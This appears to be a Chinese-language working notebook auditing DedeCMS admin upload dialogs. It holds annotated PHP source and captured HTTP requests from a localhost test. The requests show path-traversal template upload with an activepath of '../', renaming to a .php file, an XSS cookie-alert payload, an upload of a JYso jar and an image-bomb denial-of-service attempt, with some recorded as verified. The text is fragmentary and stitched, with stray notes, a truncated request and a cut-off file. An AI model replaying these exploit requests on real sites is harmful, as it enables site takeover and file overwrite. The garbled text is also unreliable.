------geckoformboundaryba800d3139c7bd02fd29544a1befd05b
Content-Disposition: form-data; name="uploadfile"; filename="Hyperdown.exe"
Content-Type: application/x-msdownload键和值是name以及后面的转行的东西吗
php
------geckoformboundaryba800d3139c7bd02fd29544a1befd05b
Content-Disposition: form-data; name="activepath"
/templets
------geckoformboundaryba800d3139c7bd02fd29544a1befd05b
Content-Disposition: form-data; name="f"
x;
------geckoformboundaryba800d3139c7bd02fd29544a1befd05b
Content-Disposition: form-data; name="job"
upload
------geckoformboundaryba800d3139c7bd02fd29544a1befd05b
Content-Disposition: form-data; name="uploadfile"; filename="Hyperdown.exe"
Content-Type: application/x-msdownload
看调试
php
<?php
/**
* 模板发送
*
* @version $Id: select_templets_post.php 1 9:43 2010年7月8日Z tianya $
* @package DedeCMS.Dialog
* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.
* @license http://help.dedecms.com/usersguide/license.html
* @link http://www.dedecms.com
*/
require_once(dirname(__FILE__)."/config.php");
//白名单
$cfg_txttype = "htm|html|tpl|txt";
//上传的文件临时路径,包含内容
if(empty($uploadfile))
{
$uploadfile = "";
}
//is_uploaded_file 是 PHP 语言里的内置函数,主要用来验证文件是否通过 HTTP POST 方式上传
if(!is_uploaded_file($uploadfile))
{
ShowMsg("你没有选择上传的文件!","-1");
exit();
}
//检查类型Content-Type: application/x-msdownload
//preg_match 是 PHP 中用来做正则表达式匹配的函数,在字符串里搜索符合特定模式的内容,找到第一个匹配就停止,返回 1 表示成功
//有没有text
//可以伪造
if(!preg_match("#^text#", $uploadfile_type))
{
ShowMsg("你上传的不是文本类型附件!","-1");
exit();
}
//这里不知道逻辑,可能是文件名
//匹配,可以伪造。
//111.html.php
//匹配任意字符就通过,不分大小写。
if(!preg_match("#\.(".$cfg_txttype.")#i", $uploadfile_name))
{
ShowMsg("你所上传的模板文件类型不能被识别,只允许htm、html、tpl、txt扩展名!","-1");
exit();
}
//检查重命名
//什么都没有
if($filename!='')
{
//preg_replace 是 PHP 中用来执行正则表达式搜索和替换的内置函数,能帮你批量处理字符串里的特定模式内容
//过滤重命名,去掉。
//不可以用这里路径穿越
//{1,}一次或者多次
$filename = trim(preg_replace("#[ \r\n\t\*\%\\\/\?><\|\":]{1,}#", '', $filename));
}
else
{
//清洗,赋值重命名
$uploadfile_name = trim(preg_replace("#[ \r\n\t\*\%\\\/\?><\|\":]{1,}#", '', $uploadfile_name));
$filename = $uploadfile_name;
//检查文件名
if($filename=='' || !preg_match("#\.(".$cfg_txttype.")#i", $filename))
{
ShowMsg("你所上传的文件存在问题,请检查文件类型是否适合!","-1");
exit();
}
}
//$activepath直接拼接,没有校验
//绝对路径拼接
$fullfilename = $cfg_basedir.$activepath."/".$filename;
move_uploaded_file($uploadfile,$fullfilename) or die("上传文件到 $fullfilename 失败!");
@unlink($uploadfile);
//urlencode 是将字符串进行 URL 编码的函数,也叫百分号编码,用于处理 URL 和 HTTP 请求中的特殊字符
//这里xss
ShowMsg("成功上传文件!","select_templets.php?comeback=".urlencode($filename)."&f=$f&activepath=".urlencode($activepath)."&d=".time());
exit();
php
foreach($_FILES as $_key=>$_value)
{
$$_key = $_value['tmp_name']; // 拼出 $imgfile
${$_key.'_name'} = $_value['name']; // 拼出 $imgfile_name
${$_key.'_type'} = $_value['type']; // 拼出 $imgfile_type
${$_key.'_size'} = $_value['size']; // 拼出 $imgfile_size
}
php
<?php
if(!defined('DEDEINC')) exit('Request Error!');
if(isset($_FILES['GLOBALS'])) exit('Request not allow!');
//为了防止用户通过注入的可能性改动了数据库
//这里强制限定的某些文件类型禁止上传
//黑名单?
$cfg_not_allowall = "php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml";
//创建数组
$keyarr = array('name', 'type', 'tmp_name', 'size');
//获取检查配置,检查服务器传输路径是否存在
if ($GLOBALS['cfg_html_editor']=='ckeditor' && isset($_FILES['upload']))
{
//赋值
$_FILES['imgfile'] = $_FILES['upload'];
$CKUpload = TRUE;
//删除键
unset($_FILES['upload']);
}
//遍历$_FILES,以键值格式取出
foreach($_FILES as $_key=>$_value)
{
//遍历值,每个检查
foreach($keyarr as $k)
{
//isset 是 PHP 中用于检测变量是否已声明且值不为 NULL 的内置函数
//检查是不是空
if(!isset($_FILES[$_key][$k]))
{
exit('Request Error!');
}
}
//如果key有这2个开头
if( preg_match('#^(cfg_|GLOBALS)#', $_key) )
{
exit('Request var not allow for uploadsafe!');
}
//获取
//关键的不过滤
//$_FILES[$_key]['tmp_name'] 是 PHP 中用于获取上传文件在服务器端的临时文件名的数组元素。
$$_key = $_FILES[$_key]['tmp_name'];
//$_FILES[$_key]['name'] 表示获取客户端上传文件的原始文件名。
${$_key.'_name'} = $_FILES[$_key]['name'];
${$_key.'_type'} = $_FILES[$_key]['type'] = preg_replace('#[^0-9a-z\./]#i', '', $_FILES[$_key]['type']);
${$_key.'_size'} = $_FILES[$_key]['size'] = preg_replace('#[^0-9]#','',$_FILES[$_key]['size']);
//文件名过滤,只要包含这些就过滤,或者没有.
if(!empty(${$_key.'_name'}) && (preg_match("#\.(".$cfg_not_allowall.")$#i",${$_key.'_name'}) || !preg_match("#\.#", ${$_key.'_name'})) )
{
//检查
if(!defined('DEDEADMIN'))
{
exit('Not Admin Upload filetype not allow !');
}
}
if(empty(${$_key.'_size'}))
{
${$_key.'_size'} = @filesize($$_key);
}
$imtypes = array
(
"image/pjpeg", "image/jpeg", "image/gif", "image/png",
"image/xpng", "image/wbmp", "image/bmp"
);
//检查类型
if(in_array(strtolower(trim(${$_key.'_type'})), $imtypes))
{
$image_dd = @getimagesize($$_key);
if (!is_array($image_dd))
{
exit('Upload filetype not allow !');
}
}
}
?>文件覆盖(成功)未看代码
任意路径上传,文件覆盖html均已验证成功。
php
POST /include/dialog/select_templets_post.php HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----geckoformboundary2b224c9b14fce4cd91f77ef38ef68ce3
Content-Length: 827
Origin: http://127.0.0.1:855
Connection: keep-alive
Referer: http://127.0.0.1:855/include/dialog/select_templets.php?f=form1.tempindex&activepath=
Cookie: PHPSESSID=400t6l6matse4k9he342me1fct; _csrf_name_63248f8b=ff2a5bdd845c29009bf2757e143c6b81; _csrf_name_63248f8b__ckMd5=908f8a43bb2c31bf; DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1781881546; DedeLoginTime__ckMd5=b6f433aac8c824dc; lastCid=12; lastCid__ckMd5=2a6723e35d8f4eb8
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
------geckoformboundary2b224c9b14fce4cd91f77ef38ef68ce3
Content-Disposition: form-data; name="activepath"
../
------geckoformboundary2b224c9b14fce4cd91f77ef38ef68ce3
Content-Disposition: form-data; name="f"
form1.tempindex
------geckoformboundary2b224c9b14fce4cd91f77ef38ef68ce3
Content-Disposition: form-data; name="job"
upload
------geckoformboundary2b224c9b14fce4cd91f77ef38ef68ce3
Content-Disposition: form-data; name="uploadfile"; filename="123.html"
Content-Type: text/html
<script>alert(document.cookie)</script>
------geckoformboundary2b224c9b14fce4cd91f77ef38ef68ce3
Content-Disposition: form-data; name="filename"
1.html
------geckoformboundary2b224c9b14fce4cd91f77ef38ef68ce3
Content-Disposition: form-data; name="sb1"
确定
------geckoformboundary2b224c9b14fce4cd91f77ef38ef68ce3--任意文件上传已验证成功。
POST /include/dialog/select_templets_post.php HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:151.0) Gecko/20100101 Firefox/151.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----geckoformboundary8c2237f03b57aa14eea072cf9ebcf3b7
Content-Length: 834
Origin: http://127.0.0.1:855
Connection: keep-alive
Referer: http://127.0.0.1:855/include/dialog/select_templets.php?f=form1.enclosure&activepath=
Cookie: _csrf_name_63248f8b=ff2a5bdd845c29009bf2757e143c6b81; _csrf_name_63248f8b__ckMd5=908f8a43bb2c31bf; DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1781882741; DedeLoginTime__ckMd5=5e372dfe734630a6; lastCid=12; lastCid__ckMd5=2a6723e35d8f4eb8; PHPSESSID=vrhr9s8fmr0m51apq5010fb0sv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
------geckoformboundary8c2237f03b57aa14eea072cf9ebcf3b7
Content-Disposition: form-data; name="activepath"
../
------geckoformboundary8c2237f03b57aa14eea072cf9ebcf3b7
Content-Disposition: form-data; name="f"
form1.enclosure
------geckoformboundary8c2237f03b57aa14eea072cf9ebcf3b7
Content-Disposition: form-data; name="job"
upload
------geckoformboundary8c2237f03b57aa14eea072cf9ebcf3b7
Content-Disposition: form-data; name="uploadfile"; filename="123.html"
Content-Type: text/html
<script>alert(document.cookie)</script>
------geckoformboundary8c2237f03b57aa14eea072cf9ebcf3b7
Content-Disposition: form-data; name="filename"
123.php
------geckoformboundary8c2237f03b57aa14eea072cf9ebcf3b7
Content-Disposition: form-data; name="sb1"
确定
------geckoformboundary8c2237f03b57aa14eea072cf9ebcf3b7--
php
<?php
/**
* 模板发送
*
* @version $Id: select_templets_post.php 1 9:43 2010年7月8日Z tianya $
* @package DedeCMS.Dialog
* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.
* @license http://help.dedecms.com/usersguide/license.html
* @link http://www.dedecms.com
*/
require_once(dirname(__FILE__)."/config.php");
$cfg_txttype = "htm|html|tpl|txt";
if(empty($uploadfile))
{
$uploadfile = "";
}
if(!is_uploaded_file($uploadfile))
{
ShowMsg("你没有选择上传的文件!","-1");
exit();
}
if(!preg_match("#^text#", $uploadfile_type))
{
ShowMsg("你上传的不是文本类型附件!","-1");
exit();
}
if(!preg_match("#\.(".$cfg_txttype.")#i", $uploadfile_name))
{
ShowMsg("你所上传的模板文件类型不能被识别,只允许htm、html、tpl、txt扩展名!","-1");
exit();
}
if($filename!='')
{
$filename = trim(preg_replace("#[ \r\n\t\*\%\\\/\?><\|\":]{1,}#", '', $filename));
}
else
{
$uploadfile_name = trim(preg_replace("#[ \r\n\t\*\%\\\/\?><\|\":]{1,}#", '', $uploadfile_name));
$filename = $uploadfile_name;
if($filename=='' || !preg_match("#\.(".$cfg_txttype.")#i", $filename))
{
ShowMsg("你所上传的文件存在问题,请检查文件类型是否适合!","-1");
exit();
}
}
$fullfilename = $cfg_basedir.$activepath."/".$filename;
move_uploaded_file($uploadfile,$fullfilename) or die("上传文件到 $fullfilename 失败!");
@unlink($uploadfile);
ShowMsg("成功上传文件!","select_templets.php?comeback=".urlencode($filename)."&f=$f&activepath=".urlencode($activepath)."&d=".time());
exit();他改名几乎是不验证的,所以成功了。
至于任意文件上传,代码没有看。
预览(任意文件读取,xss)
点一下直接闪退,然后有了这个
User-agent: * Disallow: /plus/ad_js.php Disallow: /plus/advancedsearch.php Disallow: /plus/car.php Disallow: /plus/carbuyaction.php Disallow: /plus/shops_buyaction.php Disallow: /plus/erraddsave.php Disallow: /plus/posttocar.php Disallow: /plus/disdls.php Disallow: /plus/feedback_js.php Disallow: /plus/mytag_js.php Disallow: /plus/rss.php Disallow: /plus/search.php Disallow: /plus/recommend.php Disallow: /plus/stow.php Disallow: /plus/count.php Disallow: /include Disallow: /templets
不允许读取
java
else if(preg_match("#\.(js)#i", $file))
{
//如果文件名(文件夹)等于$comeback
if( $file == $comeback ) $lstyle = " style='color:red' ";
else $lstyle = "";
$reurl = "$activeurl/$file";
$reurl = preg_replace("#\.\.#", "", $reurl);
$reurl = preg_replace("#".$templetdir."\/#", "", $reurl);
$line = "\n<tr>图片
php
POST /include/dialog/select_images_post.php HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----geckoformboundaryd4d8a1b4d9cb90703a4672f49ec6f954
Content-Length: 144591427
Origin: http://127.0.0.1:855
Connection: keep-alive
Referer: http://127.0.0.1:855/include/dialog/select_images.php?imgstick=&v=picview&f=content&activepath=%2Fuploads%2Fuserup&CKEditor=content&CKEditorFuncNum=1
Cookie: DedeUserID=1; DedeUserID__ckMd5=16f063afe3fbbf9a; DedeLoginTime=1781928664; DedeLoginTime__ckMd5=05d0d23a99939734; lastCid=12; lastCid__ckMd5=2a6723e35d8f4eb8; PHPSESSID=88cc0lbad3vmjksfe7g1k0u2ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
------geckoformboundaryd4d8a1b4d9cb90703a4672f49ec6f954
Content-Disposition: form-data; name="activepath"
/uploads/userup
------geckoformboundaryd4d8a1b4d9cb90703a4672f49ec6f954
Content-Disposition: form-data; name="f"
content
------geckoformboundaryd4d8a1b4d9cb90703a4672f49ec6f954
Content-Disposition: form-data; name="v"
picview
------geckoformboundaryd4d8a1b4d9cb90703a4672f49ec6f954
Content-Disposition: form-data; name="imgstick"
------geckoformboundaryd4d8a1b4d9cb90703a4672f49ec6f954
Content-Disposition: form-data; name="CKEditorFuncNum"
1
------geckoformboundaryd4d8a1b4d9cb90703a4672f49ec6f954
Content-Disposition: form-data; name="job"
upload
------geckoformboundaryd4d8a1b4d9cb90703a4672f49ec6f954
Content-Disposition: form-data; name="imgfile"; filename="JYso-1.3.8.jar"
Content-Type: application/octet-stream
PK
------geckoformboundaryd4d8a1b4d9cb90703a4672f49ec6f954
Content-Disposition: form-data; name="needwatermark"
1
------geckoformboundaryd4d8a1b4d9cb90703a4672f49ec6f954
Content-Disposition: form-data; name="iwidth"
240
------geckoformboundaryd4d8a1b4d9cb90703a4672f49ec6f954
Content-Disposition: form-data; name="iheight"
180
------geckoformboundaryd4d8a1b4d9cb90703a4672f49ec6f954
Content-Disposition: form-data; name="sb1"
ç¡®å®
------geckoformboundaryd4d8a1b4d9cb90703a4672f49ec6f954--图片路径穿越失败,不可以覆盖,任意文件上传未知
图片上传dos(预览无法验证)
php
POST /include/dialog/select_images_post.php?CKEditor=content&CKEditorFuncNum=2&langCode=zh-cn HTTP/1.1
Host: 127.0.0.1:855
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----geckoformboundary24664f38b294e53eb18a4d7e69b94263
Content-Length: 3520278
Origin: http://127.0.0.1:855
Connection: keep-alive
Referer: http://127.0.0.1:855/dede/catalog_edit.php?id=2271
Cookie: lastCid=12; lastCid__ckMd5=2a6723e35d8f4eb8; PHPSESSID=88cc0lbad3vmjksfe7g1k0u2ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=4
------geckoformboundary24664f38b294e53eb18a4d7e69b94263
Content-Disposition: form-data; name="upload"; filename="bomb.jpg"
php
<?php
/**
* 图片选择
*
* @version $Id: select_images_post.php 1 9:43 2010年7月8日Z tianya $
* @package DedeCMS.Dialog
* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.
* @license http://help.dedecms.com/usersguide/license.html
* @link http://www.dedecms.com
*/
require_once(dirname(__FILE__)."/config.php");
require_once(dirname(__FILE__)."/../image.func.php");
//路径
if(empty($activepath))
{
//不让路径穿越,可控
$activepath ='';
$activepath = str_replace('.', '', $activepath);
//格式规范
$activepath = preg_replace("#\/{1,}#", '/', $activepath);
if(strlen($activepath) < strlen($cfg_image_dir))
{
$activepath = $cfg_image_dir;
}
}
//文件名,可控
if(empty($imgfile))
{
$imgfile='';
}
//检查文件是否存在
//is_uploaded_file 是 PHP 内置函数,主要用来检查指定文件是不是通过 HTTP POST 方式上传的
if(!is_uploaded_file($imgfile))
{
ShowMsg("你没有选择上传的文件!".$imgfile, "-1");
exit();
}
//检查,没有过滤
//不知道是什么
$CKEditorFuncNum = (isset($CKEditorFuncNum))? $CKEditorFuncNum : 1;
//过滤名字
$imgfile_name = trim(preg_replace("#[ \r\n\t\*\%\\\/\?><\|\":]{1,}#", '', $imgfile_name));
//类型,检查白名单
if(!preg_match("#\.(".$cfg_imgtype.")#i", $imgfile_name))
{
ShowMsg("你所上传的图片类型不在许可列表,请更改系统对扩展名限定的配置!", "-1");
exit();
}
//获取时间
$nowtme = time();
$sparr = Array("image/pjpeg", "image/jpeg", "image/gif", "image/png", "image/xpng", "image/wbmp");
//trim() 主要是用来去掉文字开头和结尾多余空格的工具
$imgfile_type = strtolower(trim($imgfile_type));
//检查格式
if(!in_array($imgfile_type, $sparr))
{
ShowMsg("上传的图片格式错误,请使用JPEG、GIF、PNG、WBMP格式的其中一种!","-1");
exit();
}
//随机设置路径
$mdir = MyDate($cfg_addon_savetype, $nowtme);
//
if(!is_dir($cfg_basedir.$activepath."/$mdir"))
{
//创建
//没办法路径穿越,直接改名
MkdirAll($cfg_basedir.$activepath."/$mdir",$cfg_dir_purview);
CloseFtp();
}
//重命名,不可以覆盖
$filename_name = $cuserLogin->getUserID().'-'.dd2char(MyDate("ymdHis", $nowtme).mt_rand(100,999));
$filename = $mdir.'/'.$filename_name;
//explode() 主要是 PHP 编程中用来把字符串切分成数组的函数
$fs = explode('.', $imgfile_name);
//从0开始,取出数组中的最后一个值。
$filename = $filename.'.'.$fs[count($fs)-1];
//拼接,万一名字是php呢(好像有过滤)试试,大概率不行,重命名
$filename_name = $filename_name.'.'.$fs[count($fs)-1];
//拼接,文件可以跳跃
$fullfilename = $cfg_basedir.$activepath."/".$filename;
move_uploaded_file($imgfile, $fullfilename) or die("上传文件到 $fullfilename 失败!");
if($cfg_remote_site=='Y' && $remoteuploads == 1)
{
//分析远程文件路径
//str_replace 是 PHP 中用于字符串替换的内置函数
//str_replace(查找值,替换值,目标字符串
$remotefile = str_replace(DEDEROOT, '', $fullfilename);
//拼接,跳跃
$localfile = '../..'.$remotefile;
//创建远程文件夹
//preg_replace 是 PHP 中用来执行正则表达式搜索和替换的内置函数
//替换,把文件去掉
$remotedir = preg_replace('/[^\/]*\.(jpg|gif|bmp|png)/', '', $remotefile);
$ftp->rmkdir($remotedir);
$ftp->upload($localfile, $remotefile);
}
//
@unlink($imgfile);
//图片裁剪开关
if(empty($resize))
{
$resize = 0;
}
if($resize==1)
{
//in_array是PHP编程语言中用于检查数组是否包含指定值的内置函数
if(in_array($imgfile_type, $cfg_photo_typenames))
{
//创建图片,服务器限制
ImageResize($fullfilename, $iwidth, $iheight);
}
}
else
{
if(in_array($imgfile_type, $cfg_photo_typenames))
{
WaterImg($fullfilename, 'up');
}
}
$info = '';
$sizes[0] = 0; $sizes[1] = 0;
$sizes = getimagesize($fullfilename, $info);
$imgwidthValue = $sizes[0];
$imgheightValue = $sizes[1];
$imgsize = filesize($fullfilename);
$inquery = "INSERT INTO `#@__uploads`(arcid,title,url,mediatype,width,height,playtime,filesize,uptime,mid)
VALUES ('0','$filename','".$activepath."/".$filename."','1','$imgwidthValue','$imgheightValue','0','{$imgsize}','{$nowtme}','".$cuserLogin->getUserID()."'); ";
$dsql->ExecuteNoneQuery($inquery);
$fid = $dsql->GetLastID();
AddMyAddon($fid, $activepath.'/'.$filename);
$CKUpload = isset($CKUpload)? $CKUpload : FALSE;
if ($GLOBALS['cfg_html_editor']=='ckeditor' && $CKUpload)
{
$fileurl = $activepath.'/'.$filename;
$message = '';
$str='<script type="text/javascript">window.parent.CKEDITOR.tools.callFunction('.$CKEditorFuncNum.', \''.$fileurl.'\', \''.$message.'\');</script>';
exit($str);
}
if(!empty($noeditor)){
//(2011.08.25 根据用户反馈修正图片上传回调 by:织梦的鱼)
ShowMsg("成功上传一幅图片!","select_images.php?imgstick=$imgstick&comeback=".urlencode($filename_name)."&v=$v&f=$f&CKEditorFuncNum=$CKEditorFuncNum&noeditor=yes&activepath=".urlencode($activepath)."/$mdir&d=".time());
}else{
ShowMsg("成功上传一幅图片!","select_images.php?imgstick=$imgstick&comeback=".urlencode($filename_name)."&v=$v&f=$f&CKEditorFuncNum=$CKEditorFuncNum&activepath=".urlencode($activepath)."/$mdir&d=".time());
}
exit();理论可以,复现失败。
php
/**
* 缩图片自动生成函数,来源支持bmp、gif、jpg、png
* 但生成的小图只用jpg或png格式
*
* @access public
* @param string $srcFile 图片路径
* @param string $toW 转换到的宽度
* @param string $toH 转换到的高度
* @param string $toFile 输出文件到
* @return string
*/
if ( ! function_exists('ImageResize'))
{
function ImageResize($srcFile, $toW, $toH, $toFile="")
{
global $cfg_photo_type;
//地址赋值
if($toFile=='') $toFile = $srcFile;
$info = '';
//getimagesize是PHP中用于获取图像尺寸、类型等信息的函数
$srcInfo = GetImageSize($srcFile,$info);
//判断类型
switch ($srcInfo[2])
{
case 1:
if(!$cfg_photo_type['gif']) return FALSE;
//imagecreatefromgif主要用于从JPEG格式文件或远程URL创建图像资源
//先加载后面校验(这里dos)
$im = imagecreatefromgif($srcFile);
break;
case 2:
if(!$cfg_photo_type['jpeg']) return FALSE;
$im = imagecreatefromjpeg($srcFile);
break;
case 3:
if(!$cfg_photo_type['png']) return FALSE;
$im = imagecreatefrompng($srcFile);
break;
case 6:
if(!$cfg_photo_type['bmp']) return FALSE;
$im = imagecreatefromwbmp($srcFile);
break;
}
//PHP 获取图像宽度函数:imagesx()
//没有限制,理论可以dos
//获取远程图片信息
$srcW=ImageSX($im);
$srcH=ImageSY($im);
//前端信息对比,不可以比真实大
if($srcW<=$toW && $srcH<=$toH ) return TRUE;
//比例裁剪
//前端比例
$toWH=$toW/$toH;
//现实比例
$srcWH=$srcW/$srcH;
//前端<=现实
if($toWH<=$srcWH)
{
//前端宽
$ftoW=$toW;
//莫名其妙的比例逻辑
//前端宽*比例
//200000*(10000000/10000000)
//高
$ftoH=$ftoW*($srcH/$srcW);
}
else
{
$ftoH=$toH;
$ftoW=$ftoH*($srcW/$srcH);
}
//如果实际图片大于填写
if($srcW>$toW||$srcH>$toH)
{
//function_exists 是 PHP 语言的内置函数,用于检测指定函数是否已定义
if(function_exists("imagecreateTRUEcolor"))
{
//imagecreatetruecolor 是 PHP 中用于创建一幅真彩色空白图像的函数
//创建图片
@$ni = imagecreateTRUEcolor($ftoW,$ftoH);
if($ni)
{
//ImageCopyResampled是PHP GD图像处理库中用于调整图像尺寸的函数,通过像素插值算法实现平滑缩放效果。
//可以dos
imagecopyresampled($ni,$im,0,0,0,0,$ftoW,$ftoH,$srcW,$srcH);
}
else
{
//创建比例
$ni=imagecreate($ftoW,$ftoH);
imagecopyresized($ni,$im,0,0,0,0,$ftoW,$ftoH,$srcW,$srcH);
}
}
else
{
$ni=imagecreate($ftoW,$ftoH);
imagecopyresized($ni,$im,0,0,0,0,$ftoW,$ftoH,$srcW,$srcH);
}
//保存
switch ($srcInfo[2])
{
case 1:
imagegif($ni,$toFile);
break;
case 2:
imagejpeg($ni,$toFile,85);
break;
case 3:
imagepng($ni,$toFile);
break;
case 6:
imagebmp($ni,$toFile);
break;
default:
return FALSE;
}
imagedestroy($ni);
}
imagedestroy($im);
return TRUE;
}
}
php
function MyDate($format='Y-m-d H:i:s', $timest=0)
{
global $cfg_cli_time;
$addtime = $cfg_cli_time * 3600;
if(empty($format))
{
$format = 'Y-m-d H:i:s';
}
return gmdate ($format, $timest+$addtime);
}反射xss(条件苛刻,理论可以)
php
<?php
/**
* 图片选择框
*
* @version $Id: select_images.php 1 9:43 2010年7月8日Z tianya $
* @package DedeCMS.Dialog
* @copyright Copyright (c) 2007 - 2010, DesDev, Inc.
* @license http://help.dedecms.com/usersguide/license.html
* @link http://www.dedecms.com
*/
require_once(dirname(__FILE__)."/config.php");
include(DEDEDATA.'/mark/inc_photowatermark_config.php');
if(empty($activepath))
{
$activepath = '';
}
if(empty($imgstick))
{
$imgstick = '';
}
$noeditor = isset($noeditor)? $noeditor : '';
$activepath = str_replace('.', '', $activepath);
$activepath = preg_replace("#\/{1,}#", '/', $activepath);
if(strlen($activepath) < strlen($cfg_medias_dir))
{
$activepath = $cfg_medias_dir;
}
$inpath = $cfg_basedir.$activepath;
$activeurl = '..'.$activepath;
if(empty($f))
{
$f = 'form1.picname';
}
if(empty($v))
{
$v = 'picview';
}
if(empty($comeback))
{
$comeback = '';
}
$addparm = '';
if (!empty($CKEditor))
{
$addparm = '&CKEditor='.$CKEditor;
$f = $CKEditor;
}
if (!empty($CKEditorFuncNum))
{
$addparm .= '&CKEditorFuncNum='.$CKEditorFuncNum;
}
if (!empty($noeditor))
{
$addparm .= '&noeditor=yes';
}
?>
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=<?php echo $cfg_soft_lang; ?>'>
<title>图片浏览器</title>
<link href='../../plus/img/base.css' rel='stylesheet' type='text/css'>
<style>
.linerow {border-bottom: 1px solid #CBD8AC;}
.napisdiv {left:40;top:3;width:150px;height:100px;position:absolute;z-index:3;display:none;}
</style>
<script>
function nullLink(){ return; }
function ChangeImage(surl){ document.getElementById('picview').src = surl; }
</script>
</head>
<body background='img/allbg.gif' leftmargin='0' topmargin='0'>
<div id="floater" class="napisdiv">
<a href="javascript:nullLink();" onClick="document.getElementById('floater').style.display='none';"><img src='img/picviewnone.gif' id='picview' border='0' alt='单击关闭预览'></a>
</div>
<SCRIPT language=JavaScript src="js/float.js"></SCRIPT>
<SCRIPT language=JavaScript>
function nullLink(){ return; }
function ChangeImage(surl){ document.getElementById('floater').style.display='block';document.getElementById('picview').src = surl; }
function TNav()
{
if(window.navigator.userAgent.indexOf("MSIE")>=1) return 'IE';
else if(window.navigator.userAgent.indexOf("Firefox")>=1) return 'FF';
else return "OT";
}
// 获取地址参数
function getUrlParam(paramName)
{
var reParam = new RegExp('(?:[\?&]|&)' + paramName + '=([^&]+)', 'i') ;
var match = window.location.search.match(reParam) ;
return (match && match.length > 1) ? match[1] : '' ;
}
function ReturnImg(reimg)
{
var funcNum = getUrlParam('CKEditorFuncNum');
if(funcNum > 1)
{
var fileUrl = reimg;
window.opener.CKEDITOR.tools.callFunction(funcNum, fileUrl);
}
if(window.opener.document.<?php echo $f?> != null)
{
window.opener.document.<?php echo $f?>.value=reimg;
if(window.opener.document.getElementById('div<?php echo $v?>'))
{
if(TNav()=='IE'){
//window.opener.document.getElementById('div<?php echo $v?>').filters.item('DXImageTransform.Microsoft.AlphaImageLoader').src = reimg;
window.opener.document.getElementById('div<?php echo $v?>').src = reimg;
window.opener.document.getElementById('div<?php echo $v?>').style.width = '150px';
window.opener.document.getElementById('div<?php echo $v?>').style.height = '100px';
}
else
window.opener.document.getElementById('div<?php echo $v?>').style.backgroundImage = "url("+reimg+")";
}
else if(window.opener.document.getElementById('<?php echo $v?>')){
window.opener.document.getElementById('<?php echo $v?>').src = reimg;
}
if(document.all) window.opener=true;
}
window.close();
}
</SCRIPT>
<table width='100%' border='0' cellspacing='0' cellpadding='0' align="center">
<tr>
<td colspan='4' align='right'>
<table width='100%' border='0' cellpadding='0' cellspacing='1' bgcolor='#CBD8AC'>
<tr bgcolor='#FFFFFF'>
<td colspan='4'>
<table width='100%' border='0' cellspacing='0' cellpadding='2'>
<tr bgcolor="#CCCCCC">
<td width="8%" align="center" class='linerow' bgcolor='#EEF4EA'><strong>预览</strong></td>
<td width="47%" align="center" background="img/wbg.gif" class='linerow'><strong>点击名称选择图片</strong></td>
<td width="15%" align="center" bgcolor='#EEF4EA' class='linerow'><strong>文件大小</strong></td>
<td width="30%" align="center" background="img/wbg.gif" class='linerow'><strong>最后修改时间</strong></td>
</tr>
<tr>
<td class='linerow' colspan='4' bgcolor='#F9FBF0'>
点击"V"预览图片,点击图片名选择图片,显示图片后点击该图片关闭预览。
</td>
</tr>
<?php
$dh = dir($inpath);
$ty1="";
$ty2="";
while($file = $dh->read()) {
//-----计算文件大小和创建时间
if($file!="." && $file!=".." && !is_dir("$inpath/$file")){
$filesize = filesize("$inpath/$file");
$filesize = $filesize / 1024;
if($filesize != "")
if($filesize < 0.1){
@list($ty1, $ty2) = split("\.", $filesize);
$filesize = $ty1.".".substr($ty2, 0, 2);
}
else{
@list($ty1, $ty2) = split("\.", $filesize);
$filesize = $ty1.".".substr($ty2, 0, 1);
}
$filetime = filemtime("$inpath/$file");
$filetime = MyDate("Y-m-d H:i:s", $filetime);
}
if($file == ".") continue;
else if($file == "..")
{
if($activepath == "") continue;
